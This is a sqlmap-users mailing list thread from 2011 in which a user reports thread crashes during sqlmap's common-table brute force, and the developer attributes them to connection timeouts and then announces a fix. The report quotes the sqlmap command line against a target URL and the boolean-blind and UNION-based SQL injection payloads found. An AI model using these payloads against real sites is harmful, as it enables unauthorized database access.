Thread: [sqlmap-users] BUG table brutforce mysql 4
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: <nig...@em...> - 2011-06-07 03:21:09
|
<html><head></head><body bgcolor='#FFFFFF' style='font-size:12px;background-color:#FFFFFF;font-family:Verdana, Arial, sans-serif;'>This Bug is from my laptops sqlmap with python 2.7 The other problem is on another PC with still python 2.6 ;)<br/><br/>sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent --retries=6 --level 5 --risk 3 --common-tables -D Database<br/><br/>Place: GET<br/>Parameter: s<br/> Type: boolean-based blind<br/> Title: AND boolean-based blind - WHERE or HAVING clause<br/> Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693<br/><br/> Type: UNION query<br/> Title: MySQL UNION query (NULL) - 1 to 10 columns<br/> Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106<br/>,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND 'sOCX'='sOCX&p=48693<br/>---<br/><br/>[04:52:32] [INFO] manual usage of GET payloads requires url encoding<br/>[04:52:32] [INFO] the back-end DBMS is MySQL<br/><br/>web application technology: PHP 4.4.0, Apache 1.3.33<br/>back-end DBMS: MySQL 4<br/>[04:52:32] [INFO] checking table existence using items from 'C:\pentest\p\sqlmap.0.9-1\txt\comm<br/>on-tables.txt'<br/>[04:52:32] [INFO] adding words used on web page to the check list<br/>please enter number of threads? [Enter for 1 (current)] 3<br/>[04:52:40] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fix<br/>ing problems with some collation issues)<br/>[04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection timed out to the target url or prox<br/>y, sqlmap is going to retry the request<br/>[04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)<br/>[04:53:38] [INFO] tried 88/3452 items (3%)<br/>[04:53:39] [WARNING] user aborted during common table existence check. sqlmap will display some tables only<br/>Exception in thread 1:<br/>Traceback (most recent call last):<br/> File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner<br/> self.run()<br/> File "C:\Python27\lib\threading.py", line 485, in run<br/> self.__target(*self.__args, **self.__kwargs)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread<br/> result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1),<br/> fullTableName)))<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression<br/> value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNon<br/>e=expectingNone)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue<br/> value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband<br/> output = unionUse(expression, unpack=unpack, dump=dump)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse<br/> value = __oneShotUnionUse(expression, unpack)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUni<br/>onUse<br/> page, headers = Request.queryPage(payload, content=True, raise404=False)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage<br/> page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent<br/>=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCo<br/>mpare)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage<br/> raise sqlmapConnectionException, warnMsg<br/>sqlmapConnectionException: unable to connect to the target url or proxy<br/><br/>Exception in thread 2:<br/>Traceback (most recent call last):<br/> File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner<br/> self.run()<br/> File "C:\Python27\lib\threading.py", line 485, in run<br/> self.__target(*self.__args, **self.__kwargs)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread<br/> result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1),<br/> fullTableName)))<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression<br/> value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNon<br/>e=expectingNone)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue<br/> value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband<br/> output = unionUse(expression, unpack=unpack, dump=dump)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse<br/> value = __oneShotUnionUse(expression, unpack)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUni<br/>onUse<br/> page, headers = Request.queryPage(payload, content=True, raise404=False)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage<br/> page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent<br/>=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCo<br/>mpare)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in getPage<br/> return Connect.__getPageProxy(**kwargs)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in __getPageProxy<br/> return Connect.getPage(**kwargs)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage<br/> raise sqlmapConnectionException, warnMsg<br/>sqlmapConnectionException: connection timed out to the target url or proxy<br/><br/><br/>[04:53:55] [WARNING] no table(s) found<br/>tables: '{}'<br/><br/>[04:53:55] [INFO] Fetched data logged to text files under 'C:\pentest\p\sqlmap.0.9-1\output\<br/><br/>[*] shutting down at: 04:53:55<br/></body></html> |
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 06:00:15
|
hi nightman. well, it's not really a bug: "[04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)" i know that you've already used low number of threads (3) but it seems that you have some connection issues with your host. so, i am not sure how we could help :) kr On Tue, Jun 7, 2011 at 5:21 AM, <nig...@em...> wrote: > This Bug is from my laptops sqlmap with python 2.7 The other problem is on > another PC with still python 2.6 ;) > > sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent > --retries=6 --level 5 --risk 3 --common-tables -D Database > > Place: GET > Parameter: s > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693 > > Type: UNION query > Title: MySQL UNION query (NULL) - 1 to 10 columns > Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, > CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106 > ,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND > 'sOCX'='sOCX&p=48693 > --- > > [04:52:32] [INFO] manual usage of GET payloads requires url encoding > [04:52:32] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 4.4.0, Apache 1.3.33 > back-end DBMS: MySQL 4 > [04:52:32] [INFO] checking table existence using items from > 'C:\pentest\p\sqlmap.0.9-1\txt\comm > on-tables.txt' > [04:52:32] [INFO] adding words used on web page to the check list > please enter number of threads? [Enter for 1 (current)] 3 > [04:52:40] [WARNING] if the problem persists with 'None' values please try > to use hidden switch --no-cast (fix > ing problems with some collation issues) > [04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection > timed out to the target url or prox > y, sqlmap is going to retry the request > [04:53:24] [WARNING] if the problem persists please try to lower the number > of used threads (--threads) > [04:53:38] [INFO] tried 88/3452 items (3%) > [04:53:39] [WARNING] user aborted during common table existence check. > sqlmap will display some tables only > Exception in thread 1: > Traceback (most recent call last): > File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner > self.run() > File "C:\Python27\lib\threading.py", line 485, in run > self.__target(*self.__args, **self.__kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in > tableExistsThread > result = inject.checkBooleanExpression("%s" % > safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), > fullTableName))) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in > checkBooleanExpression > value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, > suppressOutput=True, expectingNon > e=expectingNone) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in > getValue > value = __goInband(forgeCaseExpression, expected, sort, resumeValue, > unpack, dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in > __goInband > output = unionUse(expression, unpack=unpack, dump=dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 354, in unionUse > value = __oneShotUnionUse(expression, unpack) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 72, in __oneShotUni > onUse > page, headers = Request.queryPage(payload, content=True, raise404=False) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in > queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, silent > =silent, method=method, auxHeaders=auxHeaders, response=response, > raise404=raise404, ignoreTimeout=timeBasedCo > mpare) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in > getPage > raise sqlmapConnectionException, warnMsg > sqlmapConnectionException: unable to connect to the target url or proxy > > Exception in thread 2: > Traceback (most recent call last): > File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner > self.run() > File "C:\Python27\lib\threading.py", line 485, in run > self.__target(*self.__args, **self.__kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in > tableExistsThread > result = inject.checkBooleanExpression("%s" % > safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), > fullTableName))) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in > checkBooleanExpression > value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, > suppressOutput=True, expectingNon > e=expectingNone) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in > getValue > value = __goInband(forgeCaseExpression, expected, sort, resumeValue, > unpack, dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in > __goInband > output = unionUse(expression, unpack=unpack, dump=dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 354, in unionUse > value = __oneShotUnionUse(expression, unpack) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 72, in __oneShotUni > onUse > page, headers = Request.queryPage(payload, content=True, raise404=False) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in > queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, silent > =silent, method=method, auxHeaders=auxHeaders, response=response, > raise404=raise404, ignoreTimeout=timeBasedCo > mpare) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in > getPage > return Connect.__getPageProxy(**kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in > __getPageProxy > return Connect.getPage(**kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in > getPage > raise sqlmapConnectionException, warnMsg > sqlmapConnectionException: connection timed out to the target url or proxy > > > [04:53:55] [WARNING] no table(s) found > tables: '{}' > > [04:53:55] [INFO] Fetched data logged to text files under > 'C:\pentest\p\sqlmap.0.9-1\output\ > > [*] shutting down at: 04:53:55 > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 10:30:56
|
hi again. from now on threads shouldn't cause this kind of mess. with the last commit they are going to be silently killed - in your case that would mean that they'll just handle the bandwidth to others. kr On Tue, Jun 7, 2011 at 8:00 AM, Miroslav Stampar <mir...@gm...> wrote: > hi nightman. > > well, it's not really a bug: > "[04:53:24] [WARNING] if the problem persists please try to lower the > number of used threads (--threads)" > > i know that you've already used low number of threads (3) but it seems > that you have some connection issues with your host. so, i am not sure > how we could help :) > > kr > > On Tue, Jun 7, 2011 at 5:21 AM, <nig...@em...> wrote: >> This Bug is from my laptops sqlmap with python 2.7 The other problem is on >> another PC with still python 2.6 ;) >> >> sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent >> --retries=6 --level 5 --risk 3 --common-tables -D Database >> >> Place: GET >> Parameter: s >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693 >> >> Type: UNION query >> Title: MySQL UNION query (NULL) - 1 to 10 columns >> Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, >> CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106 >> ,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND >> 'sOCX'='sOCX&p=48693 >> --- >> >> [04:52:32] [INFO] manual usage of GET payloads requires url encoding >> [04:52:32] [INFO] the back-end DBMS is MySQL >> >> web application technology: PHP 4.4.0, Apache 1.3.33 >> back-end DBMS: MySQL 4 >> [04:52:32] [INFO] checking table existence using items from >> 'C:\pentest\p\sqlmap.0.9-1\txt\comm >> on-tables.txt' >> [04:52:32] [INFO] adding words used on web page to the check list >> please enter number of threads? [Enter for 1 (current)] 3 >> [04:52:40] [WARNING] if the problem persists with 'None' values please try >> to use hidden switch --no-cast (fix >> ing problems with some collation issues) >> [04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection >> timed out to the target url or prox >> y, sqlmap is going to retry the request >> [04:53:24] [WARNING] if the problem persists please try to lower the number >> of used threads (--threads) >> [04:53:38] [INFO] tried 88/3452 items (3%) >> [04:53:39] [WARNING] user aborted during common table existence check. >> sqlmap will display some tables only >> Exception in thread 1: >> Traceback (most recent call last): >> File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner >> self.run() >> File "C:\Python27\lib\threading.py", line 485, in run >> self.__target(*self.__args, **self.__kwargs) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in >> tableExistsThread >> result = inject.checkBooleanExpression("%s" % >> safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), >> fullTableName))) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in >> checkBooleanExpression >> value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, >> suppressOutput=True, expectingNon >> e=expectingNone) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in >> getValue >> value = __goInband(forgeCaseExpression, expected, sort, resumeValue, >> unpack, dump) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in >> __goInband >> output = unionUse(expression, unpack=unpack, dump=dump) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line >> 354, in unionUse >> value = __oneShotUnionUse(expression, unpack) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line >> 72, in __oneShotUni >> onUse >> page, headers = Request.queryPage(payload, content=True, raise404=False) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in >> queryPage >> page, headers = Connect.getPage(url=uri, get=get, post=post, >> cookie=cookie, ua=ua, referer=referer, silent >> =silent, method=method, auxHeaders=auxHeaders, response=response, >> raise404=raise404, ignoreTimeout=timeBasedCo >> mpare) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in >> getPage >> raise sqlmapConnectionException, warnMsg >> sqlmapConnectionException: unable to connect to the target url or proxy >> >> Exception in thread 2: >> Traceback (most recent call last): >> File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner >> self.run() >> File "C:\Python27\lib\threading.py", line 485, in run >> self.__target(*self.__args, **self.__kwargs) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in >> tableExistsThread >> result = inject.checkBooleanExpression("%s" % >> safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), >> fullTableName))) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in >> checkBooleanExpression >> value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, >> suppressOutput=True, expectingNon >> e=expectingNone) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in >> getValue >> value = __goInband(forgeCaseExpression, expected, sort, resumeValue, >> unpack, dump) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in >> __goInband >> output = unionUse(expression, unpack=unpack, dump=dump) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line >> 354, in unionUse >> value = __oneShotUnionUse(expression, unpack) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line >> 72, in __oneShotUni >> onUse >> page, headers = Request.queryPage(payload, content=True, raise404=False) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in >> queryPage >> page, headers = Connect.getPage(url=uri, get=get, post=post, >> cookie=cookie, ua=ua, referer=referer, silent >> =silent, method=method, auxHeaders=auxHeaders, response=response, >> raise404=raise404, ignoreTimeout=timeBasedCo >> mpare) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in >> getPage >> return Connect.__getPageProxy(**kwargs) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in >> __getPageProxy >> return Connect.getPage(**kwargs) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in >> getPage >> raise sqlmapConnectionException, warnMsg >> sqlmapConnectionException: connection timed out to the target url or proxy >> >> >> [04:53:55] [WARNING] no table(s) found >> tables: '{}' >> >> [04:53:55] [INFO] Fetched data logged to text files under >> 'C:\pentest\p\sqlmap.0.9-1\output\ >> >> [*] shutting down at: 04:53:55 >> >> ------------------------------------------------------------------------------ >> EditLive Enterprise is the world's most technically advanced content >> authoring tool. Experience the power of Track Changes, Inline Image >> Editing and ensure content is compliant with Accessibility Checking. >> http://p.sf.net/sfu/ephox-dev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X